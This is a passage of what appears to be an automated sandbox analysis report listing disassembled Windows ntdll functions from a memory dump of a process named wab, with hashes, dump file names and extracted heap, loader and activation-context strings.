                  • Instruction Fuzzy Hash: 33918A30A01315ABEB15CF10DA94BAA3BF0BF62B68F50852DED407B389D7788941CB95
                  Strings
                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 2249219F
                  • SXS: %s() passed the empty activation context, xrefs: 22492165
                  • RtlGetAssemblyStorageRoot, xrefs: 22492160, 2249219A, 224921BA
                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 224921BF
                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 22492180
                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 22492178
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                  • API String ID: 0-861424205
                  • Opcode ID: f68434957345ca2d81fa4d5123a7a0d9bcf38fb9eb35c0950a277953fd2e5dff
                  • Instruction ID: 36a5a641f945ad0a8da2be383e33e10bfdce19a6fe5a8fc58b7a9bb7881f98fc
                  • Opcode Fuzzy Hash: f68434957345ca2d81fa4d5123a7a0d9bcf38fb9eb35c0950a277953fd2e5dff
                  • Instruction Fuzzy Hash: 29312433B003107BF712CA959C81F9B7B68DBB5B85F05016AFE04AB205D2B09E51CBA1
                  Strings
                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 224981E5
                  • minkernel\ntdll\ldrinit.c, xrefs: 2245C6C3
                  • LdrpInitializeProcess, xrefs: 2245C6C4
                  • minkernel\ntdll\ldrredirect.c, xrefs: 22498181, 224981F5
                  • Loading import redirection DLL: '%wZ', xrefs: 22498170
                  • LdrpInitializeImportRedirection, xrefs: 22498177, 224981EB
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                  • API String ID: 0-475462383
                  • Opcode ID: c47fc103c6c73fd51a1ee047b2822e6584146409e78b5faacb3064c28f8a939a
                  • Instruction ID: 1c622420864f052a2f30a6f472fe334872782741fe9f5661992bb4ab2e2de873
                  • Opcode Fuzzy Hash: c47fc103c6c73fd51a1ee047b2822e6584146409e78b5faacb3064c28f8a939a
                  • Instruction Fuzzy Hash: F931F271744345AFD314DF28D985E1A7BD5EFA4B54F00496CF984AB2A1EA20DE04CBA2
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID: This is located in the %s field of the heap header.$ -A"`$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                  • API String ID: 2994545307-3910963491
                  • Opcode ID: 6b8cc9b315d9434226bf58d98cb54f5060030be042813f29ed92939ec2b5d16e
                  • Instruction ID: 0db50a76d2e8f89c3ed2d1bc676b1f05baacf8e14b1dbc9e5c6db35bc84ac662
                  • Opcode Fuzzy Hash: 6b8cc9b315d9434226bf58d98cb54f5060030be042813f29ed92939ec2b5d16e
                  • Instruction Fuzzy Hash: ED31FC36210350EFD311CB98D990F6A73E8EF0CB68F104259ED45EF2A5E632A981CE60
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                  • API String ID: 0-3061284088
                  • Opcode ID: 7822cd18fff9fda5f70928c36b6dbba355e7fb8634d830f75d585feda33f6e22
                  • Instruction ID: 0729a9bbbe87fce1a1ae670e22d1401dc75f1770221ba6e8853ec23813d42303
                  • Opcode Fuzzy Hash: 7822cd18fff9fda5f70928c36b6dbba355e7fb8634d830f75d585feda33f6e22
                  • Instruction Fuzzy Hash: 5F01F737125390EEE2258F2CE549FE277F4EB46B70F24805EE41047659CA689886C960
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                  • API String ID: 0-3178619729
                  • Opcode ID: ebf804121a610447e83474d6356ea534d172275010635ca70304c6e90565029a
                  • Instruction ID: 2e6a6ce09381f688f9122af5f07b334b572e38876bf9a9bec942081772617093
                  • Opcode Fuzzy Hash: ebf804121a610447e83474d6356ea534d172275010635ca70304c6e90565029a
                  • Instruction Fuzzy Hash: 3913AF70A00755CFDB16CF68C590BA9FBF1BF58304F648169D989AB382D734A986CF90
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                  • API String ID: 2994545307-3570731704
                  • Opcode ID: bc3d3967c583b352c095c9066dcbe70bf5e7b6aec0a5a39085613f4710d5c955
                  • Instruction ID: d1a9f36099f862c849c9e1c9c2862b38abffbfcd992e121bc30353f8d929de59
                  • Opcode Fuzzy Hash: bc3d3967c583b352c095c9066dcbe70bf5e7b6aec0a5a39085613f4710d5c955
                  • Instruction Fuzzy Hash: 8C922671A00368CFEB25CB18CD40B99B7B6AF48354F1582EAD94DAB391D7349E81CF52
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI$\U?"
                  • API String ID: 0-1491600130
                  • Opcode ID: 57b937800dd5a89d9a37ec733bdb09fee0e9e6c54a0038c7c0e56446bda51fa7
                  • Instruction ID: c45d492db87e6c2d7e619e9ec50a7657b490de35ff2f33efc1e97211bbf012f0
                  • Opcode Fuzzy Hash: 57b937800dd5a89d9a37ec733bdb09fee0e9e6c54a0038c7c0e56446bda51fa7
                  • Instruction Fuzzy Hash: E9B19D31A14B448FDB15CF6ACA80B9DBBF1BF84718F144629E951EB384D734E981CB52
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                  • API String ID: 0-379654539
                  • Opcode ID: 19f2c6a8b0baf7750b3385ea4aee49fd896695ba176cb1851a6894860c616923
                  • Instruction ID: 622f516726615ddcc275024efa3194e5face81843d0a96424f928ea0fa04d830
                  • Opcode Fuzzy Hash: 19f2c6a8b0baf7750b3385ea4aee49fd896695ba176cb1851a6894860c616923
                  • Instruction Fuzzy Hash: 72C18B74108B928FE711CF16C644B6AB7E4BF84748F004A6EFD958B351E778CA86CB52
                  Strings
                  • SXS: %s() passed the empty activation context, xrefs: 224921DE
                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 224922B6
                  • .Local, xrefs: 224528D8
                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 224921D9, 224922B1
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                  • API String ID: 0-1239276146
                  • Opcode ID: de32a8ab1b14c7f879bb23f5e8fc7930a0df6494d08d9b22215d40180abe61f5
                  • Instruction ID: a64e66f6b3f18fd8f397166cff4588474dca914148ca2c308fc1afe9ef9f5c39
                  • Opcode Fuzzy Hash: de32a8ab1b14c7f879bb23f5e8fc7930a0df6494d08d9b22215d40180abe61f5
                  • Instruction Fuzzy Hash: 00A18D35A013299BCB24CF64D984B99B7B1BF68318F2141EADD48AB351D7B09ED1CF90
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                  • API String ID: 2994545307-2586055223
                  • Opcode ID: a4e512e2b78bbdda0c86d58d867c760b10ddb5bcfecba1c43fbc51749e1320bc
                  • Instruction ID: c732229f23908aa6c752aab52812df94e7ba57fff05ca40f26d2282abaa0c177
                  • Opcode Fuzzy Hash: a4e512e2b78bbdda0c86d58d867c760b10ddb5bcfecba1c43fbc51749e1320bc
                  • Instruction Fuzzy Hash: 5A61D372304784AFE311CB68D944F5777E8EF84B54F150668FA648B392DB34D942CB61
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                  • API String ID: 2994545307-1391187441
                  • Opcode ID: 4064b2dce1bdbd23abd9785a79b6f3d5d21e51b7a5a3fd8bd6409282a6c34f5c
                  • Instruction ID: dce89bc1c699b51e0f0c435a1954770801b71e136e1a1536acabe679ecbc3264
                  • Opcode Fuzzy Hash: 4064b2dce1bdbd23abd9785a79b6f3d5d21e51b7a5a3fd8bd6409282a6c34f5c
                  • Instruction Fuzzy Hash: 2531BE36A10304EFDB12DF59C888FDAB7F8EF45B64F144165E924AB291D770ED81CA60
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$BuildLabEx$EE"$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                  • API String ID: 0-2459882804
                  • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                  • Instruction ID: 993195d9923bf5afbb92cd1a1cff720dbd1d5f3a5361a6f50274680ebcf52444
                  • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                  • Instruction Fuzzy Hash: 2D31AF72D00319BBDB12DFA5CC40EFEBBB9EB94B54F004029EA14A7260D770DA45CB90
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                  • API String ID: 0-4253913091
                  • Opcode ID: 4f0540130af898258ae122d846d9c27eadc5e99efaacffbb889ae3049a074e42
                  • Instruction ID: 7325edf73daff41df667590e3423744949f8c04a56660f77f921a2de9e3c0f90
                  • Opcode Fuzzy Hash: 4f0540130af898258ae122d846d9c27eadc5e99efaacffbb889ae3049a074e42
                  • Instruction Fuzzy Hash: DAF16A70A00705DFE716CF68C990F6AB7B6FF48704F218268E5159B395D734AA81CF91
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                  • API String ID: 0-2391371766
                  • Opcode ID: 70559590882a7e93557998916dfdd3947c9802fc20155ed554a0836a782d61ed
                  • Instruction ID: ce3b8b21ac196edc104c0c0e31fe7898299d636ea7cfc265ba83b4c45c1fe20c
                  • Opcode Fuzzy Hash: 70559590882a7e93557998916dfdd3947c9802fc20155ed554a0836a782d61ed
                  • Instruction Fuzzy Hash: A1B1AD71604741AFE311CF54C9A0F6BBBE8BB58B58F00492EFA519B290E774ED44CB92
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: FilterFullPath$UseFilter$\??\
                  • API String ID: 0-2779062949
                  • Opcode ID: d98738909c201053bf85a0623bee9c018892d5dc3742b1651ecf5e4bb472a959
                  • Instruction ID: a101ad35c05838ccd78b761904e64aca00c7d92d8a01cac87497b70a77aa87fa
                  • Opcode Fuzzy Hash: d98738909c201053bf85a0623bee9c018892d5dc3742b1651ecf5e4bb472a959
                  • Instruction Fuzzy Hash: 4DA16E719013299BDB21DF64CD88BE9B7B8EF48B14F1001EADA18A7250D7759F84CF50
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                  • API String ID: 0-318774311
                  • Opcode ID: 6a3b8e94681d2a8bbd09c87ed50a42a0282110b23cc28a98ee81762c79d8e99b
                  • Instruction ID: 227382f99b717419e86132f8be97c4498ebd6a24a4fec3b71d077f06e0fc98fc
                  • Opcode Fuzzy Hash: 6a3b8e94681d2a8bbd09c87ed50a42a0282110b23cc28a98ee81762c79d8e99b
                  • Instruction Fuzzy Hash: 21816171A08741AFE711CB16C940F6ABBE8EF85B58F00496DFE909B390D774D944CB62
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: %$&$@
                  • API String ID: 0-1537733988
                  • Opcode ID: 4ce0f8d40eb28c1cb24e4b4e71c101c25f42085370f4cf4dc753264858bef2f3
                  • Instruction ID: 8495574f994002f399da1f1c3105cb53e6269bad5249d3de18fea8550e888ca5
                  • Opcode Fuzzy Hash: 4ce0f8d40eb28c1cb24e4b4e71c101c25f42085370f4cf4dc753264858bef2f3
                  • Instruction Fuzzy Hash: C971BF705093419FD724CF24C680A1BBBE5BFA9B18F208E1DF5D98B291C731D956CB92
                  Strings
                  • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 224FB82A
                  • GlobalizationUserSettings, xrefs: 224FB834
                  • TargetNtPath, xrefs: 224FB82F
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                  • API String ID: 0-505981995
                  • Opcode ID: 59b64ef4bbc2b364c24e7a154c188d07d39652749903e52e91986bbcbb06dd74
                  • Instruction ID: c89587e76aa0e25cad3ed7f6797d9e9edd369c27abc235217845de4daf5984cf
                  • Opcode Fuzzy Hash: 59b64ef4bbc2b364c24e7a154c188d07d39652749903e52e91986bbcbb06dd74
                  • Instruction Fuzzy Hash: 8D617172941729ABDB21DF54CC88FD9B7B8AF59754F1101E9EA08A7250CB34DE80CF90
                  Strings
                  • LdrpInitializePerUserWindowsDirectory, xrefs: 224982DE
                  • minkernel\ntdll\ldrinit.c, xrefs: 224982E8
                  • Failed to reallocate the system dirs string !, xrefs: 224982D7
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-1783798831
                  • Opcode ID: 00f0d4f3410390484d3b0a2a013d766d3d57a6d982b45da328071533874a26c5
                  • Instruction ID: acf56f2ec4b7b567d0013e503f64e42209247b1f93852b3e08e1f50f59da62c1
                  • Opcode Fuzzy Hash: 00f0d4f3410390484d3b0a2a013d766d3d57a6d982b45da328071533874a26c5
                  • Instruction Fuzzy Hash: 0541CE72584701ABD721DF64C980F4B7BE8EF68B50F01892EFD9897294EB74DA10CB91
                  Strings
                  • LdrpAllocateTls, xrefs: 22491B40
                  • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 22491B39
                  • minkernel\ntdll\ldrtls.c, xrefs: 22491B4A
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                  • API String ID: 0-4274184382
                  • Opcode ID: 08f5b874726b148c81d7c9e814e0613ebfbe3f4229dc2e35d685810ec1db5820
                  • Instruction ID: 05c13768c7a44115ad89ee8a4020a8ee4f005c8ae84db68279519a81019774c6
                  • Opcode Fuzzy Hash: 08f5b874726b148c81d7c9e814e0613ebfbe3f4229dc2e35d685810ec1db5820
                  • Instruction Fuzzy Hash: 28417C75A00704AFDB15CFA9C981FAEBBF5FF68718F108529E409A7320D775A950CB90
                  Strings
                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 224DC1C5
                  • PreferredUILanguages, xrefs: 224DC212
                  • @, xrefs: 224DC1F1
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                  • API String ID: 0-2968386058
                  • Opcode ID: 95aa5a8e4908d8d589c77cf82101934b3f0c3e43c1e767eed555a992381a3c3e
                  • Instruction ID: 627ec0094b36695ce78899f5ea5b23fdffec04e588dc35abebd5c0e1d25a200e
                  • Opcode Fuzzy Hash: 95aa5a8e4908d8d589c77cf82101934b3f0c3e43c1e767eed555a992381a3c3e
                  • Instruction Fuzzy Hash: 75417E72E00309EBDB01CFD4C9A1FEEB7B9AB14B14F10416AEA05BB284D7749B45CB90
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                  • API String ID: 0-1373925480
                  • Opcode ID: e92426014c71d247dcbdf71adaff71e24ea18cfa567efb9b14932790960f099b
                  • Instruction ID: 1df34d33a684cbb39ba6bb8f7b6e4c520609794e8069d980e69393827e40de7d
                  • Opcode Fuzzy Hash: e92426014c71d247dcbdf71adaff71e24ea18cfa567efb9b14932790960f099b
                  • Instruction Fuzzy Hash: B4410331D007488BEB16CBE4D960BADBBB4EFB5784F20056AD900FF391D6348941CB61
                  Strings
                  • LdrpCheckRedirection, xrefs: 224A488F
                  • minkernel\ntdll\ldrredirect.c, xrefs: 224A4899
                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 224A4888
                  Memory Dump Source
